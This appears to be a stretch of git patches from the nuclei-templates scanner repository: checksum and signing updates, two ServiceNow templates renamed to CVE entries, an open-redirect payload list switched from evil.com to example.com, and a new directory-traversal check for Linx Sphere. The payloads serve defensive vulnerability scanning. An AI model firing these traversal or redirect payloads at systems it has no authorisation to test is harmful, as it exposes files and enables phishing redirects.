+http/technologies/wordpress/plugins/wp-google-maps.yaml:575f9cea92b315b9b4f6f03fd6aa2de3623c9c79 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:18807172f174731c819d8606f4efe66a54b7db74 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:661dc3f38e9fd5b13db10c246089c997cdaeb550 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:165e9f8c1273a6188d1e1037f0ee82d056c7df57 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:62e086c85a88a4646e336d3927159bfa10867287 +http/technologies/wordpress/plugins/wp-optimize.yaml:30d46f826fde3770066331d3a29cfa75181c6711 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:b2a8b79afd40bd54121b36e8f27c16dcab026de5 +http/technologies/wordpress/plugins/wp-reset.yaml:f597c7d2ce59b9a1fcb23cdd871f96184c112184 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:237054db5866dc14de8bead8745429893c81e797 +http/technologies/wordpress/plugins/wp-rollback.yaml:90c3b49e657c1186a109f599e81cbbb9d145f860 +http/technologies/wordpress/plugins/wp-seopress.yaml:89f57653f4a2b8c388e5583863f9ae7dd5b91c0e +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:3a01c2506c1928baab1ad3a3964aea517cd6384c +http/technologies/wordpress/plugins/wp-smushit.yaml:0b579d41eaacb3c8953c63481e8bbde1e16bc89b +http/technologies/wordpress/plugins/wp-statistics.yaml:f70622472d4c3f837406a2d98043dd23c444025e +http/technologies/wordpress/plugins/wp-super-cache.yaml:416a9b4fbdf72f1ec1e69ac39d996118a85acce7 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a81303e83900e1d4834034539c46cb1f0bcfe2b0 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:c49c55740439ac30aae04f3e24c46b258be99a56 +http/technologies/wordpress/plugins/wpforms-lite.yaml:9bfdfed939246d7b7acb5152b55caed5e3162ee5 +http/technologies/wordpress/plugins/wps-hide-login.yaml:b2674656f7f2c54296993ef6903f34a2b8b58c77 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:89a656ce74ee54465ca91c3e3b9dae6d03c76c60 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:adb615b4e31cd30133a82da5c23bbdd8bb818863 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8695,7 +8695,7 @@ network/cves/2001/CVE-2001-1473.yaml:febab57b73d417adcee7535327476a56b072adb4 network/cves/2011/CVE-2011-2523.yaml:39eba544ecf40cd742e5042c18c9f28b07d73c58 network/cves/2015/CVE-2015-3306.yaml:9f687f191fa20b97861ec04cb5acfe798248f611 network/cves/2016/CVE-2016-2004.yaml:19c23411a63774a87b8e604d0bf08fe083eb1614 -network/cves/2016/CVE-2016-3510.yaml:f535d7959e2f7afcde395f448e5ea93d8e49fd6d +network/cves/2016/CVE-2016-3510.yaml:e467641144cd548948ef78b7e95ae2d692f0362a network/cves/2017/CVE-2017-3881.yaml:b814b5ded3051d4eaec01c4a486fac3ac4abffa7 network/cves/2017/CVE-2017-5645.yaml:693cc474f86c8081efc4e66545dc41a046fe2a5a network/cves/2018/CVE-2018-2628.yaml:c1e2d99c2938bf24dbc6d38523702fc408b1472a @@ -8867,7 +8867,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4193ef091c7925f655faf0f4762ae8c78c13fc1d +templates-checksum.txt:b748c4b3a95fd74ac14a2b627b759eba660f41ad wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a46f3b2268822b358e2520eea3ee84e716e6c0de Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 07:47:01 +0000 Subject: [PATCH 1123/1841] Auto Template Signing [Thu Jul 11 07:47:01 UTC 2024] :robot: --- network/cves/2016/CVE-2016-3510.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index 9cdd02fbcc..135b08938d 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -54,4 +54,4 @@ tcp: part: interactsh_protocol words: - "dns" -# digest: 4b0a004830460221008d2606c39e5ea4351864ef8062f319aec1821364ae05e12d4a6867a0849c930e022100c7edf99ab68a3c8ede7cbdecae0b8d1516e23763e7df36b3baf2418063aa343b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220249734c4ffaf01327913e598f9c62ff98446ffee85dcdfdb4af8dfb53fe03782022100be0f48fd1c9ffe208aa0dd7ab36cccf7983c13eb3c4d75cb85b7e5573f2b5199:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ef3f373a4855c379c4d54c157716180620470583 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 15:17:23 +0530 Subject: [PATCH 1124/1841] Update and rename http/misconfiguration/servicenow-ssti.yaml to http/cves/2024/CVE-2024-4879.yaml --- .../2024/CVE-2024-4879.yaml} | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) rename http/{misconfiguration/servicenow-ssti.yaml => cves/2024/CVE-2024-4879.yaml} (50%) diff --git a/http/misconfiguration/servicenow-ssti.yaml b/http/cves/2024/CVE-2024-4879.yaml similarity index 50% rename from http/misconfiguration/servicenow-ssti.yaml rename to http/cves/2024/CVE-2024-4879.yaml index e6b547a56f..0cd1ae0f3c 100644 --- a/http/misconfiguration/servicenow-ssti.yaml +++ b/http/cves/2024/CVE-2024-4879.yaml @@ -1,20 +1,22 @@ -id: servicenow-ssti +id: CVE-2024-4879 info: - name: Service Now - Template Injection Mitigation Bypass + name: Jelly Template Injection Vulnerability in ServiceNow UI Macros author: DhiyaneshDk - severity: high + severity: critical + description: | + ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible. reference: - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data - classification: - cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:* + - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293 + - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1645154 metadata: verified: true max-request: 1 vendor: servicenow product: servicenow shodan-query: - - http.favicon.hash:1701804003 + - http.favicon.hash:"1701804003" - http.title:"servicenow" fofa-query: - icon_hash=1701804003 From 48d666905a4ebbced75d28db1f54b3004c769cf3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 15:19:39 +0530 Subject: [PATCH 1125/1841] add author name --- http/cves/2024/CVE-2024-4879.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4879.yaml b/http/cves/2024/CVE-2024-4879.yaml index 0cd1ae0f3c..1f8343fa62 100644 --- a/http/cves/2024/CVE-2024-4879.yaml +++ b/http/cves/2024/CVE-2024-4879.yaml @@ -2,7 +2,7 @@ id: CVE-2024-4879 info: name: Jelly Template Injection Vulnerability in ServiceNow UI Macros - author: DhiyaneshDk + author: DhiyaneshDk,ritikchaddha severity: critical description: | ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible. From 0e295cf703b60e37d056c720216b5f4cfe13a5fb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 15:24:04 +0530 Subject: [PATCH 1126/1841] minor-update --- .../2024/CVE-2024-5217.yaml} | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) rename http/{misconfiguration/servicenow-filesystem-bypass.yaml => cves/2024/CVE-2024-5217.yaml} (55%) diff --git a/http/misconfiguration/servicenow-filesystem-bypass.yaml b/http/cves/2024/CVE-2024-5217.yaml similarity index 55% rename from http/misconfiguration/servicenow-filesystem-bypass.yaml rename to http/cves/2024/CVE-2024-5217.yaml index ff155f4152..998cff4b47 100644 --- a/http/misconfiguration/servicenow-filesystem-bypass.yaml +++ b/http/cves/2024/CVE-2024-5217.yaml @@ -1,20 +1,22 @@ -id: servicenow-filesystem-bypass +id: CVE-2024-5217 info: - name: Service Now - Filesystem Filter Bypass - author: DhiyaneshDk - severity: high + name: ServiceNow Incomplete Input Validation in GlideExpression Script + author: DhiyaneshDk,ritikchaddha + severity: critical + description: | + ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible. reference: - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data - classification: - cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:* + - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293 + - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1648313 metadata: verified: true max-request: 1 vendor: servicenow product: servicenow shodan-query: - - http.favicon.hash:1701804003 + - http.favicon.hash:"1701804003" - http.title:"servicenow" fofa-query: - icon_hash=1701804003 From 7cc2da843fe8b8794031ece43253e93463fe8a4d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Thu, 11 Jul 2024 12:02:28 +0200 Subject: [PATCH 1127/1841] Using different URL as we don't know who evil.com is controlled by --- .../redirect/open-redirect.yaml | 6 +- .../generic/open-redirect-generic.yaml | 188 +++++++++--------- 2 files changed, 97 insertions(+), 97 deletions(-) diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index 736d0bd7c1..47d693a75a 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -16,7 +16,7 @@ http: payloads: redirect: - - "evil.com" + - "example.com" fuzzing: - part: query @@ -174,11 +174,11 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 - type: status status: - 301 - 302 - 307 -# digest: 490a004630440220798dab0882b46e287f296c1f1ba1f9b47422c2b080486183184727f3de119087022044b26046d5aba5529bb7583ccebd65748198fff98a625c16b07432abf5a4fe8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220798dab0882b46e287f296c1f1ba1f9b47422c2b080486183184727f3de119087022044b26046d5aba5529bb7583ccebd65748198fff98a625c16b07432abf5a4fe8c:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/generic/open-redirect-generic.yaml b/http/vulnerabilities/generic/open-redirect-generic.yaml index 10879db292..dbb5973f19 100644 --- a/http/vulnerabilities/generic/open-redirect-generic.yaml +++ b/http/vulnerabilities/generic/open-redirect-generic.yaml @@ -20,99 +20,99 @@ http: payloads: redirect: - - '%0a/evil.com/' - - '%0d/evil.com/' - - '%00/evil.com/' - - '%09/evil.com/' - - '%5C%5Cevil.com/%252e%252e%252f' - - '%5Cevil.com' - - '%5cevil.com/%2f%2e%2e' - - '%5c{{RootURL}}evil.com/%2f%2e%2e' - - '../evil.com' - - '.evil.com' - - '/%5cevil.com' - - '////\;@evil.com' - - '////evil.com' - - '///evil.com' - - '///evil.com/%2f%2e%2e' - - '///evil.com@//' - - '///{{RootURL}}evil.com/%2f%2e%2e' - - '//;@evil.com' - - '//\/evil.com/' - - '//\@evil.com' - - '//\evil.com' - - '//\tevil.com/' - - '//evil.com/%2F..' - - '//evil.com//' + - '%0a/example.com/' + - '%0d/example.com/' + - '%00/example.com/' + - '%09/example.com/' + - '%5C%5Cexample.com/%252e%252e%252f' + - '%5Cexample.com' + - '%5cexample.com/%2f%2e%2e' + - '%5c{{RootURL}}example.com/%2f%2e%2e' + - '../example.com' + - '.example.com' + - '/%5cexample.com' + - '////\;@example.com' + - '////example.com' + - '///example.com' + - '///example.com/%2f%2e%2e' + - '///example.com@//' + - '///{{RootURL}}example.com/%2f%2e%2e' + - '//;@example.com' + - '//\/example.com/' + - '//\@example.com' + - '//\example.com' + - '//\texample.com/' + - '//example.com/%2F..' + - '//example.com//' - '//%69%6e%74%65%72%61%63%74%2e%73%68' - - '//evil.com@//' - - '//evil.com\tevil.com/' - - '//https://evil.com//' - - '/<>//evil.com' - - '/\/\/evil.com/' - - '/\/evil.com' - - '/\evil.com' - - '/evil.com' - - '/evil.com/%2F..' - - '/evil.com/' - - '/evil.com/..;/css' - - '/https:evil.com' - - '/{{RootURL}}evil.com/' - - '/〱evil.com' - - '/〵evil.com' - - '/ゝevil.com' - - '/ーevil.com' - - '/ーevil.com' - - '<>//evil.com' - - '@evil.com' - - '@https://evil.com' - - '\/\/evil.com/' - - 'evil%E3%80%82com' - - 'evil.com' - - 'evil.com/' - - 'evil.com//' - - 'evil.com;@' - - 'https%3a%2f%2fevil.com%2f' - - 'https:%0a%0devil.com' - - 'https://%0a%0devil.com' - - 'https://%09/evil.com' - - 'https://%2f%2f.evil.com/' - - 'https://%3F.evil.com/' - - 'https://%5c%5c.evil.com/' - - 'https://%5cevil.com@' - - 'https://%23.evil.com/' - - 'https://.evil.com' - - 'https://////evil.com' - - 'https:///evil.com' - - 'https:///evil.com/%2e%2e' - - 'https:///evil.com/%2f%2e%2e' - - 'https:///evil.com@evil.com/%2e%2e' - - 'https:///evil.com@evil.com/%2f%2e%2e' - - 'https://:80#@evil.com/' - - 'https://:80?@evil.com/' - - 'https://:@\@evil.com' - - 'https://:@evil.com\@evil.com' - - 'https://;@evil.com' - - 'https://\tevil.com/' - - 'https://evil.com/evil.com' - - 'https://evil.com/https://evil.com/' - - 'https://www.\.evil.com' - - 'https:/\/\evil.com' - - 'https:/\evil.com' - - 'https:/evil.com' - - 'https:evil.com' - - '{{RootURL}}evil.com' - - '〱evil.com' - - '〵evil.com' - - 'ゝevil.com' - - 'ーevil.com' - - 'ーevil.com' - - 'redirect/evil.com' - - 'cgi-bin/redirect.cgi?evil.com' - - 'out?evil.com' - - 'login?to=http://evil.com' - - '1/_https@evil.com' - - 'redirect?targeturl=https://evil.com' + - '//example.com@//' + - '//example.com\texample.com/' + - '//https://example.com//' + - '/<>//example.com' + - '/\/\/example.com/' + - '/\/example.com' + - '/\example.com' + - '/example.com' + - '/example.com/%2F..' + - '/example.com/' + - '/example.com/..;/css' + - '/https:example.com' + - '/{{RootURL}}example.com/' + - '/〱example.com' + - '/〵example.com' + - '/ゝexample.com' + - '/ーexample.com' + - '/ーexample.com' + - '<>//example.com' + - '@example.com' + - '@https://example.com' + - '\/\/example.com/' + - 'example%E3%80%82com' + - 'example.com' + - 'example.com/' + - 'example.com//' + - 'example.com;@' + - 'https%3a%2f%2fexample.com%2f' + - 'https:%0a%0dexample.com' + - 'https://%0a%0dexample.com' + - 'https://%09/example.com' + - 'https://%2f%2f.example.com/' + - 'https://%3F.example.com/' + - 'https://%5c%5c.example.com/' + - 'https://%5cexample.com@' + - 'https://%23.example.com/' + - 'https://.example.com' + - 'https://////example.com' + - 'https:///example.com' + - 'https:///example.com/%2e%2e' + - 'https:///example.com/%2f%2e%2e' + - 'https:///example.com@example.com/%2e%2e' + - 'https:///example.com@example.com/%2f%2e%2e' + - 'https://:80#@example.com/' + - 'https://:80?@example.com/' + - 'https://:@\@example.com' + - 'https://:@example.com\@example.com' + - 'https://;@example.com' + - 'https://\texample.com/' + - 'https://example.com/example.com' + - 'https://example.com/https://example.com/' + - 'https://www.\.example.com' + - 'https:/\/\example.com' + - 'https:/\example.com' + - 'https:/example.com' + - 'https:example.com' + - '{{RootURL}}example.com' + - '〱example.com' + - '〵example.com' + - 'ゝexample.com' + - 'ーexample.com' + - 'ーexample.com' + - 'redirect/example.com' + - 'cgi-bin/redirect.cgi?example.com' + - 'out?example.com' + - 'login?to=http://example.com' + - '1/_https@example.com' + - 'redirect?targeturl=https://example.com' stop-at-first-match: true @@ -121,7 +121,7 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - type: status status: @@ -130,4 +130,4 @@ http: - 307 - 308 condition: or -# digest: 4b0a00483046022100f4fe9201a11ea90485c2a26c406a0dbecb9ea8e674bf3ccbcaf01ed4c57421c3022100a9c075d4a231b4acd4adfce87b2f858c65cb9dc3b896d7b07759c4395e0be18f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f4fe9201a11ea90485c2a26c406a0dbecb9ea8e674bf3ccbcaf01ed4c57421c3022100a9c075d4a231b4acd4adfce87b2f858c65cb9dc3b896d7b07759c4395e0be18f:922c64590222798bb761d5b6d8e72950 From 7d235a1783654ccdb923c27554ed878a8eaf3bad Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 15:58:52 +0530 Subject: [PATCH 1128/1841] Create CVE-2022-45269.yaml --- http/cves/2022/CVE-2022-45269.yaml | 41 ++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/cves/2022/CVE-2022-45269.yaml diff --git a/http/cves/2022/CVE-2022-45269.yaml b/http/cves/2022/CVE-2022-45269.yaml new file mode 100644 index 0000000000..034a50c08d --- /dev/null +++ b/http/cves/2022/CVE-2022-45269.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-45269 + +info: + name: Linx Sphere - Directory Traversal + author: robotshell + severity: high + description: | + A directory traversal vulnerability in the component SCS.Web.Server.SPI/1.0 of Linx Sphere LINX 7.35.ST15 allows attackers to read arbitrary files. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-45269 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-45269 + cwe-id: CWE-22 + epss-score: 0.00238 + epss-percentile: 0.62196 + cpe: cpe:2.3:a:gmaolinx:linx_sphere:7.35.st15:*:*:*:*:*:*:* + metadata: + vendor: gmaolinx + product: linx_sphere + fofa-query: "SCS.Web.Server.SPI/1.0" + verified: true + max-request: 1 + tags: cve,cve2022,linx,lfi,scs + +http: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../../../../windows/iis.log" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Component Based Setup" + + - type: status + status: + - 200 From 363df1333838cd73b0facb657f2d027092136a29 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 10:34:02 +0000 Subject: [PATCH 1130/1841] Auto Generated Templates Checksum [Thu Jul 11 10:34:02 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c4980c8234..c10910e641 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3189,7 +3189,7 @@ http/cves/2023/CVE-2023-35156.yaml:72c2e061bd7264a8e88e39bed12978ba41608ad8 http/cves/2023/CVE-2023-35158.yaml:76d09942bb434d541e43eb224218c181af2a2f1f http/cves/2023/CVE-2023-35159.yaml:9f8fc8da01c8040e353b9610eb25ec936e90babb http/cves/2023/CVE-2023-35160.yaml:18c32e9c618ae99d50b0d2772e2196b575e2ba36 -http/cves/2023/CVE-2023-35161.yaml:fa11ab42365fadb4cc5d8cdd38720d6f001ea994 +http/cves/2023/CVE-2023-35161.yaml:668551d8aeaeb39fa7e104e72eb27a2a115ffdc2 http/cves/2023/CVE-2023-35162.yaml:b3c53552dcd6e3ef5ee198684f10ef0eec25f283 http/cves/2023/CVE-2023-35813.yaml:071b2cdd7e888724f69f9772dafccd2fd315b143 http/cves/2023/CVE-2023-35843.yaml:fff3bc3dfbc836e0287b00ec362b9c5dda57a0a0 @@ -8695,7 +8695,7 @@ network/cves/2001/CVE-2001-1473.yaml:febab57b73d417adcee7535327476a56b072adb4 network/cves/2011/CVE-2011-2523.yaml:39eba544ecf40cd742e5042c18c9f28b07d73c58 network/cves/2015/CVE-2015-3306.yaml:9f687f191fa20b97861ec04cb5acfe798248f611 network/cves/2016/CVE-2016-2004.yaml:19c23411a63774a87b8e604d0bf08fe083eb1614 -network/cves/2016/CVE-2016-3510.yaml:e467641144cd548948ef78b7e95ae2d692f0362a +network/cves/2016/CVE-2016-3510.yaml:1863484c0587cb78f50142c006f4c76b9bb93f18 network/cves/2017/CVE-2017-3881.yaml:b814b5ded3051d4eaec01c4a486fac3ac4abffa7 network/cves/2017/CVE-2017-5645.yaml:693cc474f86c8081efc4e66545dc41a046fe2a5a network/cves/2018/CVE-2018-2628.yaml:c1e2d99c2938bf24dbc6d38523702fc408b1472a @@ -8867,7 +8867,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b748c4b3a95fd74ac14a2b627b759eba660f41ad +templates-checksum.txt:f8668e71b502b435ce1feef6124aa09978815aa5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a50ba2a3d2bf3d66ef7632cde6fdc5a0181afb21 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 10:35:45 +0000 Subject: [PATCH 1131/1841] Auto Template Signing [Thu Jul 11 10:35:45 UTC 2024] :robot: --- http/cves/2023/CVE-2023-35161.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-35161.yaml b/http/cves/2023/CVE-2023-35161.yaml index 702f0126ae..58f2ac723c 100644 --- a/http/cves/2023/CVE-2023-35161.yaml +++ b/http/cves/2023/CVE-2023-35161.yaml @@ -55,4 +55,4 @@ http: status: - 200 - 401 -# digest: 490a004630440220754ce20184edbf704cd6f1e7e69a70f61dfa7503c16e166e04bb380a7576fca7022040bb69bfb99ba4aa9a3465fc7765917ae85b4e2f6fcd05c3789e9b5b41468356:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c7bcbe16baa8a21f333fa5ed379a8884065a1239c5b0b7383f9e4f90b9639cc502203ae5145579fb561fd26d924299d10301713b0e23f6ad0f61629ac35245b294aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5aa62fd2c5a5a83918d894966e2414c91e37d79d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 11 Jul 2024 11:05:06 +0000 Subject: [PATCH 1132/1841] Auto Generated New Template Addition List [Thu Jul 11 11:05:06 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 56a631c95e..9f4492b6f3 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cves/2022/CVE-2022-45269.yaml http/cves/2023/CVE-2023-4220.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml From 30b704543ee117347e49eb4bdcf3514e02693eee Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 11:05:12 +0000 Subject: [PATCH 1133/1841] Auto Generated Templates Checksum [Thu Jul 11 11:05:12 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c10910e641..32ad59b48b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2953,6 +2953,7 @@ http/cves/2022/CVE-2022-44952.yaml:c629ee34322ee56610296866a376746cae941860 http/cves/2022/CVE-2022-44957.yaml:097dbdc04c9ec9d0a8917061295cb399d2eb77e8 http/cves/2022/CVE-2022-45037.yaml:6abb4c091e036c9d52b7c996e0c26d9531ba8f4a http/cves/2022/CVE-2022-45038.yaml:d2503018ebb3d9883bc8ed21f43e67f15422aae5 +http/cves/2022/CVE-2022-45269.yaml:42c23aec173e5c280fc5e053fb6f3773c06a0202 http/cves/2022/CVE-2022-45354.yaml:e3388e631771c460f4ce83eab6279d2497c2e190 http/cves/2022/CVE-2022-45362.yaml:ade84fe7804fdef6dfb1718899ac3b1917cfc679 http/cves/2022/CVE-2022-45365.yaml:f637eb5c57aab39ea572b90b5f0c5519f06e8ed1 @@ -3189,7 +3190,7 @@ http/cves/2023/CVE-2023-35156.yaml:72c2e061bd7264a8e88e39bed12978ba41608ad8 http/cves/2023/CVE-2023-35158.yaml:76d09942bb434d541e43eb224218c181af2a2f1f http/cves/2023/CVE-2023-35159.yaml:9f8fc8da01c8040e353b9610eb25ec936e90babb http/cves/2023/CVE-2023-35160.yaml:18c32e9c618ae99d50b0d2772e2196b575e2ba36 -http/cves/2023/CVE-2023-35161.yaml:668551d8aeaeb39fa7e104e72eb27a2a115ffdc2 +http/cves/2023/CVE-2023-35161.yaml:d3e86a15a6240c0806b2503462384f4fc41f790d http/cves/2023/CVE-2023-35162.yaml:b3c53552dcd6e3ef5ee198684f10ef0eec25f283 http/cves/2023/CVE-2023-35813.yaml:071b2cdd7e888724f69f9772dafccd2fd315b143 http/cves/2023/CVE-2023-35843.yaml:fff3bc3dfbc836e0287b00ec362b9c5dda57a0a0 @@ -8867,7 +8868,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f8668e71b502b435ce1feef6124aa09978815aa5 +templates-checksum.txt:00c5eea4535afc542fbd095a5206e4b52ede0bea wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2000b9c1b0dbc8db06a977f218719e1508ed30cc Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 11 Jul 2024 11:05:57 +0000 Subject: [PATCH 1134/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b3ea198a56..bdccb66e70 100644 --- a/.github/workflows/templates-sync.yml +++ 